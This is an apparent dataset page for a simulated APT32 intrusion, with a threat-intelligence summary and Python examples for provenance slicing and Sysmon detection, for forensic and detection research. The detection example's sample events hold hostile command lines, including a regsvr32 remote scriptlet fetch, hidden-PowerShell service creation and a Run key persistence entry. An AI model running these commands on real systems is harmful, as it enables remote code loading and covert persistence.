APT32

This dataset captures detailed forensic evidence and system behavior generated from a simulated APT32 cyberattack scenario. The attack emulation was based on multiple Cyber Threat Intelligence (CTI) reports describing real-world tactics and techniques attributed to the APT32 threat actor group. The goal is to provide a comprehensive view of host and network-level activities during a full attack chain in a controlled cyber range.

Contents

1. Provenance Graphs

  • .dot files representing system-level events and causal dependencies.
  • Two variants:
    • *-provenance-graph.dot: Linux-based systems.
    • *-sysmon-provenance-graph.dot: Windows-based systems.

2. System Logs

Linux Hosts
  • audit.log from /var/log/audit/
  • sysdig.scap (zipped in /var/log/sysdig.zip) from Sysdig monitoring

Windows Hosts
  • Microsoft-Windows-Sysmon_Operational.evtx from Sysmon logs

3. Attack Annotation

  • annotation-attack.csv: Semicolon-delimited file that maps events to attack steps.
  • Includes fields such as timestamp, system, executable, and high-level activity label.

4. Network Capture

  • .pcap files capturing network traffic from both Linux (tcpdump) and Windows (Pktmon).

5. Memory Dumps

  • Raw memory images (*.elf) collected during the simulation are available upon request for in-depth analysis.
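The annotation file and the provenance graphs are meant to be used together: the CSV tells you which executable on which host belongs to which attack step, and the .dot graph tells you how that executable came to run and what it touched. The Python below is an added example (not the dataset's own tooling) that parses a semicolon-delimited annotation sample, parses a DOT edge list, and cuts the graph down to the backward and forward provenance of the annotated executables. Both inputs are constructed for the example; the CSV column names (timestamp, system, executable, activity) and the DOT node/edge labelling are assumptions, so check the real file headers and graph schema before reusing it.

```python
import csv
import io
import re
from collections import defaultdict

# Constructed sample of annotation-attack.csv (semicolon-delimited, as the page
# says). The column names are an assumption for this example; check the real
# file's header before relying on them.
ANNOTATION_CSV = """timestamp;system;executable;activity
2025-03-01T10:02:11Z;win-ws01;WINWORD.EXE;Initial Access - malicious document
2025-03-01T10:02:15Z;win-ws01;powershell.exe;Execution - PowerShell one-liner
2025-03-01T10:03:40Z;win-ws01;net.exe;Discovery - net localgroup administrators
2025-03-01T10:05:02Z;win-ws01;reg.exe;Persistence - Registry Run key
2025-03-01T10:07:30Z;lnx-srv01;curl;Command and Control - HTTP download
"""

# Constructed DOT fragment in the shape of a process/file provenance graph.
# Node names and edge labels are assumptions; the dataset's own
# *-provenance-graph.dot files may use a different schema.
PROVENANCE_DOT = """digraph G {
  "explorer.exe" -> "WINWORD.EXE" [label="fork"];
  "WINWORD.EXE" -> "cmd.exe" [label="fork"];
  "cmd.exe" -> "powershell.exe" [label="fork"];
  "powershell.exe" -> "net.exe" [label="fork"];
  "powershell.exe" -> "stage.ps1" [label="write"];
  "powershell.exe" -> "reg.exe" [label="fork"];
  "svchost.exe" -> "wuauclt.log" [label="write"];
}
"""

# Matches one quoted-node DOT edge with an optional [label="..."] attribute.
EDGE_RE = re.compile(r'"([^"]+)"\s*->\s*"([^"]+)"(?:\s*\[label="([^"]*)"\])?')


def parse_dot_edges(dot_text):
    """Extract (src, dst, label) triples from a quoted-node DOT digraph."""
    return [(m.group(1), m.group(2), m.group(3) or "")
            for m in EDGE_RE.finditer(dot_text)]


def load_annotations(csv_text):
    """Parse the semicolon-delimited annotation file, ordered by timestamp."""
    rows = list(csv.DictReader(io.StringIO(csv_text), delimiter=";"))
    return sorted(rows, key=lambda r: r["timestamp"])


def _reach(edges, start, forward):
    """Nodes reachable from `start` (descendants if forward, else ancestors)."""
    adj = defaultdict(set)
    for src, dst, _ in edges:
        if forward:
            adj[src].add(dst)
        else:
            adj[dst].add(src)
    seen, stack = set(), [start]
    while stack:
        for nxt in adj[stack.pop()]:
            if nxt not in seen:
                seen.add(nxt)
                stack.append(nxt)
    return seen


def ancestors(edges, node):
    """Backward provenance: the chain of events that led to `node`."""
    return _reach(edges, node, forward=False)


def descendants(edges, node):
    """Forward provenance: everything `node` went on to spawn or write."""
    return _reach(edges, node, forward=True)


def attack_slice(edges, annotations, system):
    """Restrict the graph to the annotated executables on `system` plus their
    backward and forward provenance, dropping unrelated benign activity."""
    flagged = {r["executable"] for r in annotations if r["system"] == system}
    keep = set(flagged)
    for exe in flagged:
        keep |= ancestors(edges, exe) | descendants(edges, exe)
    return [e for e in edges if e[0] in keep and e[1] in keep]


if __name__ == "__main__":
    edges = parse_dot_edges(PROVENANCE_DOT)
    ann = load_annotations(ANNOTATION_CSV)
    for src, dst, label in attack_slice(edges, ann, "win-ws01"):
        print(f"{src} -[{label}]-> {dst}")
```

The slice keeps the Office-to-PowerShell chain and the file PowerShell wrote, while the unrelated svchost.exe write is dropped; on the real graphs the same idea is what turns tens of thousands of events into the handful an analyst actually reviews.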

Cyber Threat Intelligence (CTI) Description

APT32 is a suspected Vietnam-based threat group that has been active since at least 2014. The group has targeted multiple private sector industries as well as foreign governments, dissidents, and journalists, with a strong focus on Southeast Asian countries such as Vietnam, the Philippines, Laos, and Cambodia.

Initial access and delivery: APT32 has made extensive use of strategic web compromises, infecting victims by tricking them into visiting compromised watering hole websites. The group has set up and operated websites to gather information and deliver malware, and has set up Facebook pages in tandem with fake websites. It has used Dropbox, Amazon S3, and Google Drive to host malicious downloads.

Execution: APT32 has used JavaScript that communicates over HTTP or HTTPS to attacker-controlled domains to download additional frameworks, and has downloaded encrypted payloads over HTTP. The group has used PowerShell-based tools, PowerShell one-liners, and shellcode loaders for execution, as well as cmd.exe. It has used macros, COM scriptlets, and VBS scripts, including COM scriptlets to download Cobalt Strike beacons.

Persistence: APT32 established persistence using Registry Run keys, both to execute PowerShell and VBS scripts and to execute its backdoor directly. The group modified Windows services to ensure PowerShell scripts were loaded on the system, and also creates a Windows service to establish persistence.

Discovery, command and control, and exfiltration: APT32 enumerated administrative users using the command net localgroup administrators. The group has used email for C2 via an Office macro and JavaScript for drive-by downloads and C2 communications. APT32's backdoor has used LZMA compression and RC4 encryption before exfiltration.

CTI Report: link
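Several of the behaviours above leave a recognisable trace in the Sysmon logs this dataset ships: "net localgroup administrators" as a process creation, a Run key value pointing at a script host as a registry SetValue event, regsvr32 pulling a scriptlet as one common way COM scriptlets are loaded, sc.exe creating a service, and an Office process spawning PowerShell for the macro case. The Python below is an added example of that detection logic (not part of the dataset or of the PROVCON tooling) run over a handful of constructed, Sysmon-shaped events. Field names follow Sysmon's EventID 1 (ProcessCreate) and EventID 13 (RegistryEvent SetValue) schemas; the events themselves, the IP address, and the service and file names are made up for the example.

```python
import re

# Constructed, Sysmon-style events (a subset of the fields Sysmon writes for
# EventID 1 ProcessCreate and EventID 13 RegistryEvent/SetValue). These are
# invented for the example and are not records from the dataset.
EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\net.exe",
     "CommandLine": "net localgroup administrators",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"EventID": 13, "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Update",
     "Details": r"wscript.exe //B C:\Users\u\AppData\Roaming\update.vbs"},
    {"EventID": 1, "Image": r"C:\Windows\System32\regsvr32.exe",
     "CommandLine": "regsvr32 /s /n /u /i:http://198.51.100.7/a.sct scrobj.dll",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\sc.exe",
     "CommandLine": r'sc create WinUpdSvc binPath= "powershell -w hidden -f C:\ProgramData\s.ps1" start= auto',
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -enc SQBFAFgA",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"},
    {"EventID": 1, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt",
     "ParentImage": r"C:\Windows\explorer.exe"},
]

SCRIPT_HOSTS = ("powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe")
OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe")


def _base(path):
    """Lower-cased file name of a Windows path, for case-insensitive matching."""
    return path.rsplit("\\", 1)[-1].lower()


def rule_admin_enum(e):
    """net.exe / net1.exe listing the local Administrators group."""
    return (e["EventID"] == 1 and _base(e["Image"]) in ("net.exe", "net1.exe")
            and re.search(r"localgroup\s+administrators", e["CommandLine"], re.I) is not None)


def rule_run_key_script(e):
    """A Run key value whose data launches a script host or script file."""
    if e["EventID"] != 13 or r"\CurrentVersion\Run" not in e["TargetObject"]:
        return False
    return re.search(r"powershell|wscript|cscript|\.vbs\b|\.ps1\b", e["Details"], re.I) is not None


def rule_com_scriptlet(e):
    """regsvr32 loading scrobj.dll or fetching a scriptlet over HTTP(S)."""
    return (e["EventID"] == 1 and _base(e["Image"]) == "regsvr32.exe"
            and re.search(r"scrobj\.dll|/i:https?:", e["CommandLine"], re.I) is not None)


def rule_service_create(e):
    """sc.exe creating a new service (persistence via a Windows service)."""
    return (e["EventID"] == 1 and _base(e["Image"]) == "sc.exe"
            and re.search(r"\bcreate\b", e["CommandLine"], re.I) is not None)


def rule_office_spawns_host(e):
    """An Office application spawning a script host (macro execution)."""
    return (e["EventID"] == 1 and _base(e.get("ParentImage", "")) in OFFICE_APPS
            and _base(e["Image"]) in SCRIPT_HOSTS)


RULES = {
    "admin group enumeration via net.exe": rule_admin_enum,
    "Run key launching a script": rule_run_key_script,
    "regsvr32 COM scriptlet load": rule_com_scriptlet,
    "service creation via sc.exe": rule_service_create,
    "Office spawning a script host": rule_office_spawns_host,
}


def detect(events):
    """Apply every rule to every event; return (event_index, rule_name) hits."""
    hits = []
    for i, e in enumerate(events):
        for name, rule in RULES.items():
            if rule(e):
                hits.append((i, name))
    return hits


if __name__ == "__main__":
    for idx, name in detect(EVENTS):
        print(f"event {idx}: {name}")
```

The rules key on the image basename and command line rather than the full path so that they survive the usual evasion of running the binary from a copied location; the benign notepad.exe event at the end is there to show they do not fire on ordinary activity. On the real Microsoft-Windows-Sysmon_Operational.evtx files the same functions can be fed records parsed out of the EVTX, and the hits cross-checked against annotation-attack.csv to measure coverage of each attack step.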


License

This dataset is licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) license.

You are free to share, modify, and build upon the data for any purpose, including commercial use, as long as proper credit is given to the original authors.


Citation

If you use this dataset in your work, please cite the following publication:

```bibtex
@inproceedings{provcon25,
  title     = {From {Observations} to {Insights}: {Constructing} {Effective} {Cyberattack} {Provenance} {With} {PROVCON}},
  language  = {en},
  booktitle = {Workshop on {SOC} {Operations} and {Construction} ({WOSOC}) 2025},
  author    = {Yusof, Anis and Li, Shaofei and Kawatra, Arshdeep Singh and Li, Ding and Chang, Ee-Chien and Liang, Zhenkai},
  year      = {2025},
  isbn      = {9798991927604},
  doi       = {https://dx.doi.org/10.14722/wosoc.2025.23008},
}
```

Additional info

Field            Value
Last modified    May 10, 2025, 06:46 (UTC)
Created          May 10, 2025, 05:04 (UTC)